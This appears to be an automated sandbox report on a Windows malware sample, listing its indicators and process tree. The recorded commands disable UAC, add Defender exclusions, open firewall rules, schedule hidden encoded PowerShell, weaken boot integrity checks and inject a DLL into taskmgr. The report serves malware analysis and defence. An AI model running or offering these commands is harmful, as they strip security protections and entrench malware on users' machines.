040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2708	powershell.exe
3064	wRnukjaj5Om8QYF5cIvTLrkH.exe
400	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
1052	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
1052	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
1052	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
1052	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
1052	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
748	injector.exe
1656	powershell.EXE
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
1656	powershell.EXE
1656	powershell.EXE
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe
748	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
472	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	CasPol.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	3064	wRnukjaj5Om8QYF5cIvTLrkH.exe
Token: SeImpersonatePrivilege	3064	wRnukjaj5Om8QYF5cIvTLrkH.exe
Token: SeDebugPrivilege	400	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
Token: SeImpersonatePrivilege	400	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
Token: SeSystemEnvironmentPrivilege	2236	csrss.exe
Token: SeDebugPrivilege	1656	powershell.EXE
Token: SeSecurityPrivilege	2100	sc.exe
Token: SeSecurityPrivilege	2100	sc.exe
Token: SeDebugPrivilege	2620	powershell.EXE
Token: SeDebugPrivilege	756	powershell.EXE
Token: SeDebugPrivilege	2108	powershell.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1340	Derdc26BaZmmO2FnzfGzxwll.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2448 wrote to memory of 2708	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	28
PID 2448 wrote to memory of 2708	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	28
PID 2448 wrote to memory of 2708	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	28
PID 2448 wrote to memory of 2708	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	28
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2448 wrote to memory of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30
PID 2772 wrote to memory of 400	2772	CasPol.exe	31
PID 2772 wrote to memory of 400	2772	CasPol.exe	31
PID 2772 wrote to memory of 400	2772	CasPol.exe	31
PID 2772 wrote to memory of 400	2772	CasPol.exe	31
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 1548	2772	CasPol.exe	32
PID 2772 wrote to memory of 3064	2772	CasPol.exe	33
PID 2772 wrote to memory of 3064	2772	CasPol.exe	33
PID 2772 wrote to memory of 3064	2772	CasPol.exe	33
PID 2772 wrote to memory of 3064	2772	CasPol.exe	33
PID 2772 wrote to memory of 888	2772	CasPol.exe	34
PID 2772 wrote to memory of 888	2772	CasPol.exe	34
PID 2772 wrote to memory of 888	2772	CasPol.exe	34
PID 2772 wrote to memory of 888	2772	CasPol.exe	34
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 2976	2772	CasPol.exe	43
PID 2772 wrote to memory of 1616	2772	CasPol.exe	41
PID 2772 wrote to memory of 1616	2772	CasPol.exe	41
PID 2772 wrote to memory of 1616	2772	CasPol.exe	41
PID 2772 wrote to memory of 1616	2772	CasPol.exe	41
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2976 wrote to memory of 1340	2976	Derdc26BaZmmO2FnzfGzxwll.exe	42
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 2772 wrote to memory of 884	2772	CasPol.exe	45
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47
PID 884 wrote to memory of 1716	884	DEENLxL2jKdw406uQjofG0v6.exe	47

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
"C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2708
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Users\Admin\Pictures\O9P9qO4Tj2MHoOpmI7ubFOQm.exe
    "C:\Users\Admin\Pictures\O9P9qO4Tj2MHoOpmI7ubFOQm.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:400
  - - C:\Users\Admin\Pictures\O9P9qO4Tj2MHoOpmI7ubFOQm.exe
      "C:\Users\Admin\Pictures\O9P9qO4Tj2MHoOpmI7ubFOQm.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      PID:1052
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2332
- - C:\Users\Admin\Pictures\5LNKR5e8PgfkJD6U3XC43l49.exe
    "C:\Users\Admin\Pictures\5LNKR5e8PgfkJD6U3XC43l49.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1548
- - C:\Users\Admin\Pictures\wRnukjaj5Om8QYF5cIvTLrkH.exe
    "C:\Users\Admin\Pictures\wRnukjaj5Om8QYF5cIvTLrkH.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3064
  - - C:\Users\Admin\Pictures\wRnukjaj5Om8QYF5cIvTLrkH.exe
      "C:\Users\Admin\Pictures\wRnukjaj5Om8QYF5cIvTLrkH.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:2080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2688
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:2892
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2476
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:2832
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1836
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3004
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2964
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:568
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1732
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1320
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1116
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1804
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2420
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2044
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1828
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1520
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2428
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1860
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:748
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2500
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:2648
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2496
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2052
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
- - C:\Users\Admin\Pictures\oOxhbuRZToEZjtYcGpxjn9Wu.exe
    "C:\Users\Admin\Pictures\oOxhbuRZToEZjtYcGpxjn9Wu.exe"
    3⤵
    - Executes dropped EXE
    PID:888
- - C:\Users\Admin\Pictures\3SQC3UNhscLbuWUPVbn7zCER.exe
    "C:\Users\Admin\Pictures\3SQC3UNhscLbuWUPVbn7zCER.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:1616
- - C:\Users\Admin\Pictures\Derdc26BaZmmO2FnzfGzxwll.exe
    "C:\Users\Admin\Pictures\Derdc26BaZmmO2FnzfGzxwll.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2976
- - C:\Users\Admin\Pictures\DEENLxL2jKdw406uQjofG0v6.exe
    "C:\Users\Admin\Pictures\DEENLxL2jKdw406uQjofG0v6.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\7zSE80E.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1716
    - - C:\Users\Admin\AppData\Local\Temp\7zSF170.tmp\Install.exe
        
        .\Install.exe /mGaXdidI "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks for any installed AV software in registry
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:1532
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:2988
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:1940
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:240
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:1868
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:1960
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:2672
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gxckXckdU" /SC once /ST 02:46:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:2544
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gxckXckdU"
        6⤵
        
        PID:2360
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gxckXckdU"
        6⤵
        
        PID:1136
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\BpHuwsu.exe\" cj /vhsite_idCqD 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2352

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240204035512.log C:\Windows\Logs\CBS\CbsPersist_20240204035512.cab
1⤵
- Drops file in Windows directory
PID:3008

C:\Users\Admin\AppData\Local\Temp\is-QCD4N.tmp\Derdc26BaZmmO2FnzfGzxwll.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QCD4N.tmp\Derdc26BaZmmO2FnzfGzxwll.tmp" /SL5="$D00DE,831488,831488,C:\Users\Admin\Pictures\Derdc26BaZmmO2FnzfGzxwll.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:1340

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2584

C:\Windows\system32\taskeng.exe
taskeng.exe {CD005FFE-DDBA-4E13-859F-663E4641EFD3} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]
1⤵
PID:3028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- - C:\Windows\system32\gpupdate.exe
